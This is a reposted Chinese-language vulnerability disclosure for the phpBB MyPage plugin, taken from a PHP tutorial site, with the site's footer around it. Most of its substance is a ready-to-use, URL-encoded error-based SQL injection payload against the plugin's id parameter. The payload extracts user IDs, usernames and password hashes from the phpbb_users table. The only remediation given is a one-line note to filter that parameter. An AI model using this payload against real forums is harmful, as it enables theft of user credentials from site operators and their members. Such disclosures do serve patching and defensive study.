来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] ====================================================MyPage plugin (phpBB) SQL Injection (All versions)====================================================标题: SQL Injection on the plug......
|
==================================================== MyPage plugin (phpBB) SQL Injection (All versions) ==================================================== 标题: SQL Injection on the plugin phpBB plugin MyPage 作者: CrazyMouse (from HackSociety.net) www.2cto.com 版本: 0.2.3 (目前全版本均受影响) 测试平台: Windows 7 x64 (Firefox) 测试
http://www.2cto.com /forum/
[~] http://www.2cto.com /forum/mypage.php?id= (SQL)
[~]示例:
http://www.2cto.com /forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271
修复:过滤id参数输入 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
